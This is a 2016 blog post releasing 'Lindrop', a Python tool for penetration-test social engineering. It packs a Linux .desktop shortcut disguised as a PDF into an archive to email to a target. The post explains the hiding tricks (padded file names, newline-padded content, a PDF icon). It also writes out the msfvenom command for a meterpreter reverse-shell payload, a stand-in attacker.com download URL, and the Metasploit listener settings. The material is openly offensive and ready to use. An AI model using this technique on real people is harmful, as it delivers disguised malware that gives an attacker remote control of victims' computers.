home // code //

10/15/2016 Lindrop - A Social Engineering Vector for Linux Targets A quick/dirty python utility that generates a zip archive containing a “malicious” .desktop (aka shortcut) file that masquerades as a PDF file (not really, sort of). This is probably nothing new, but i needed a way to specifically target linux users for certain social engineering engagements, where I could send a zip and/or tar.gz file via email, and generate something on-the-fly. So i came up with this quick mess of a tool. It basically exploits the “Exec” section of a .desktop file to: 1. Download a PDF and display it to the user. 2. Download and execute a linux/x86/meterpreter/reverse_tcp payload. There’s some really oldschool basic obfuscation involved in the creation of the .desktop file. For one, the file name is generated with spaces between the .pdf and .desktop extensions. This is to obfuscate the actual file extension when the archive is just straight-up opened up in Archive Manager: Second, there are a bunch of newlines in the actual .desktop file itself, so if double clicked on, from inside Archive Manager, unless you scroll all the way down, there’s nothing too obvious (aside from the fact it’s actually not a PDF! Another thing to note here…the “Icon” section. This contains a reference to a local SVG file which gives the .desktop shortcut an icon. In this case, we’re using an icon that’s typically included with gnome and associated to PDF files. If this SVG file doesn’t exist on the target system, then the file will look like an executable, blowing its amazing cover story of being a PDF file. Anyway…on to the tool… Lindrop takes 4 inputs: 1. An output name for the “PDF” (.desktop) file that will be in the zip. 2. An output name for the archive file. 3. A remote payload URL. (I.e., http://www.attacker.com/payload) This will be downloaded to the /tmp directory on the target box. For this example, we’re simply creating a payload with msfvenom: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=listener_ip LPORT=listener_port -f elf > payload 4. A remote PDF to download and display to the user. In the case of this example, we’re remotely loading Blackhat 2016’s Attendee survey: https://www.blackhat.com/docs/us-16/2016-Black-Hat-Attendee-Survey.pdf Behind the scenes, Xpdf is used to open the PDF file. You should end up with a zip and a tar.gz file, either of which are ready to send to your target: Extracting the contents gives is a nice little quasi-“PDF” file: Executing the file, from the perspective of the target, opens up (using Xpdf), the Blackhat presentation (or resume, or whichever PDF you tell it to download/open up): On the attacker side, we have a listener up using the following resource file in metasploit, waiting for a connection from the payload the .desktop file has downloaded, and that we generated previously with msfvenom: use exploit/multi/handler set ExitOnSession false set LHOST 0.0.0.0 set LPORT 6666 set PAYLOAD linux/x86/meterpreter/reverse_tcp exploit -j This was all tested in the latest Kali Rolling. But will probably work on mostly all distros that handle .desktop files the same way. This code is probably buggy (won’t take spaces in any of the inputs, and probably other minor problems) and I’m sure could be improved. At the moment, it just drops a “pl892” payload in the /tmp directory (change that), along with the remote PDF file downloaded to /tmp/temp.pdf. You can download lindrop here: lindrop.py Enjoy!